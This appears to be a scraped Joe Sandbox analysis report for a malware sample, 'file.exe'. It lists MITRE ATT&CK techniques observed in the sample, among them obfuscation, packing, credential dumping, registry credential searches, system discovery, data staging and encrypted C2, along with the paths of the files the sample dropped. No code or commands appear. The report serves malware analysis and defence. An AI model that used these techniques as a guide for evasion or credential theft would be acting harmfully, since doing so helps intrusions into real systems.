Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\9d221b6b

C:\Users\user\AppData\Local\Temp\RarSFX0\CrashRpt.dll

C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe

C:\Users\user\AppData\Local\Temp\RarSFX0\cv099.dll

C:\Users\user\AppData\Local\Temp\RarSFX0\cxcore099.dll

C:\Users\user\AppData\Local\Temp\RarSFX0\cximagecrt.dll

C:\Users\user\AppData\Local\Temp\RarSFX0\dbghelp.dll

C:\Users\user\AppData\Local\Temp\RarSFX0\highgui099.dll

C:\Users\user\AppData\Local\Temp\RarSFX0\ith

C:\Users\user\AppData\Local\Temp\RarSFX0\jlfx

C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe

C:\Users\user\AppData\Local\Temp\b37dab96

C:\Users\user\AppData\Local\Temp\b9f3530d

C:\Users\user\AppData\Local\Temp\dawfefqddjbx

C:\Users\user\AppData\Local\Temp\thiphljqfhe

C:\Users\user\AppData\Local\Temp\ydoicpxmibx

C:\Users\user\AppData\Roaming\EH_Monitor_test\CrashRpt.dll

Windows Analysis Report
file.exe

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre